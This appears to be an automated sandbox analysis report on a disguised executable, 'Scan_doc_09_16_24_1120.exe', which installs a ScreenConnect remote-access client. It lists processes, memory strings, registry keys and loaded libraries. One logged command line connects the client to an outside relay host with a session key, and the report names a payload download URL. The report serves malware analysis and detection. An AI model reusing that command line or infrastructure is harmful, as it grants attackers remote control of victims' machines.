                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.2283633645.00000000014D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.Client.applicationPNT
                  Source: svchost.exe, 00000007.00000002.3272697084.0000022265A69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com:443/RST2.srf
                  Source: svchost.exe, 00000007.00000002.3272697084.0000022265A69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com:443/RST2.srfo
                  Source: svchost.exe, 00000007.00000002.3272976064.0000022265AA4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.comanc
                  Source: svchost.exe, 00000007.00000003.2056634730.0000022265363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056612582.0000022265340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3270925562.0000022264A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056573432.000002226533B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/MSARST2.srf
                  Source: svchost.exe, 00000007.00000002.3270885495.0000022264A47000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056634730.0000022265363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056612582.0000022265340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056573432.000002226533B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceAssociate.srf
                  Source: svchost.exe, 00000007.00000002.3270885495.0000022264A47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srfU
                  Source: svchost.exe, 00000007.00000003.2056634730.0000022265363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056612582.0000022265340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056573432.000002226533B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceQuery.srf
                  Source: svchost.exe, 00000007.00000002.3270885495.0000022264A47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceQuery.srfU
                  Source: svchost.exe, 00000007.00000002.3270885495.0000022264A47000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056634730.0000022265363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056612582.0000022265340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056573432.000002226533B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceUpdate.srf
                  Source: svchost.exe, 00000007.00000002.3270885495.0000022264A47000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056634730.0000022265363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056612582.0000022265340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056573432.000002226533B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/EnumerateDevices.srf
                  Source: svchost.exe, 00000007.00000002.3270885495.0000022264A47000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056634730.0000022265363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056612582.0000022265340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056573432.000002226533B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/ResolveUser.srf
                  Source: svchost.exe, 00000007.00000002.3270885495.0000022264A47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceaddmsacredential.srf
                  Source: svchost.exe, 00000007.00000002.3270885495.0000022264A47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/devicechangecredential.srfToken
                  Source: svchost.exe, 00000007.00000002.3270885495.0000022264A47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceremovecredential.srf
                  Source: qmgr.db.6.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe/C:
                  Source: svchost.exe, 00000007.00000003.2056573432.000002226533B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://signup.live.com/signup.aspx
                  Source: unknown HTTPS traffic detected: 178.215.236.119:443 -> 192.168.2.5:49705 version: TLS 1.2
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1

                  Spam, unwanted Advertisements and Ransom Demands

                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnect
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\ScreenConnect

                  System Summary

                  Source: initial sample Static PE information: Filename: Scan_doc_09_16_24_1120.exe
                  Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe File created: C:\Windows\system32\user.config
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log
                  Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 5572 -ip 5572
                  Source: Scan_doc_09_16_24_1120.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, PopoutPanelTaskbarButton.cs Task registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ProgramTaskbarButton.cs Task registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, TaskbarButton.cs Task registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe0.1.dr, PopoutPanelTaskbarButton.cs Task registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe0.1.dr, ProgramTaskbarButton.cs Task registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe0.1.dr, TaskbarButton.cs Task registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.cs Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.cs Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                  Source: ScreenConnect.ClientService.dll.1.dr, WindowsLocalUserExtensions.cs Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                  Source: classification engine Classification label: mal66.evad.winEXE@21/78@2/2
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exe Code function: 0_2_00831000 LocalAlloc, LocalAlloc, GetModuleFileNameW, CertOpenSystemStoreA, LocalAlloc, LocalAlloc, CryptQueryObject, LocalFree, CryptMsgGetParam, CryptMsgGetParam, LocalAlloc, LocalAlloc, CryptMsgGetParam, CertCreateCertificateContext, CertAddCertificateContextToStore, CertFreeCertificateContext, LocalFree, CryptMsgGetParam, LocalFree, LocalFree, CryptMsgGetParam, CryptMsgGetParam, CertFindAttribute, CertFindAttribute, CertFindAttribute, LoadLibraryA, GetProcAddress, Sleep, CertDeleteCertificateFromStore, CertDeleteCertificateFromStore, CertCloseStore, LocalFree, LocalFree, LocalFree
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Deployment
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe Mutant created: NULL
                  Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5572
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe Mutant created: \BaseNamedObjects\Global\netfxeventlog.1.0
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exe Command line argument: dfshim 0_2_00831000
                  Source: Scan_doc_09_16_24_1120.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: Scan_doc_09_16_24_1120.exe Virustotal: Detection: 13%
                  Source: Scan_doc_09_16_24_1120.exe ReversingLabs: Detection: 18%
                  Source: unknown Process created: C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exe "C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exe"
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
                  Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                  Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 5572 -ip 5572
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5572 -s 684
                  Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                  Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                  Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process created: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe"
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=ttyuio.zapto.org&p=8041&s=73549b67-726b-470e-ab1a-fbbb83a6a15b&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session" "1"
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=ttyuio.zapto.org&p=8041&s=73549b67-726b-470e-ab1a-fbbb83a6a15b&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session" "1"
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe Process created: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe" "RunRole" "1714a821-0bba-4f94-9027-e5dd47ba7bd8" "User"
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe Process created: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe" "RunRole" "be4104e4-6414-4af7-ae9c-6dc20c5434ce" "System"
                  Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5572 -s 684
                  Source: C:\Windows\SysWOW64\WerFault.exe Process created: unknown unknown
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exe Section loaded: apphelp.dll
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exe Section loaded: msasn1.dll
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exe Section loaded: cryptsp.dll
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exe Section loaded: rsaenh.dll
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exe Section loaded: cryptbase.dll
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exe Section loaded: dfshim.dll
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exe Section loaded: version.dll
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exe Section loaded: mscoree.dll
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exe Section loaded: urlmon.dll
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exe Section loaded: iertutil.dll
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exe Section loaded: srvcli.dll
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exe Section loaded: netutils.dll
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exe Section loaded: kernel.appcore.dll
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exe Section loaded: uxtheme.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: mscoree.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: kernel.appcore.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: cryptsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dfshim.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cryptnet.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cabinet.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: uiautomationcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wersvc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: windowsperformancerecordercontrol.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: weretw.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wer.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: faultrep.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dbghelp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dbgcore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wer.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
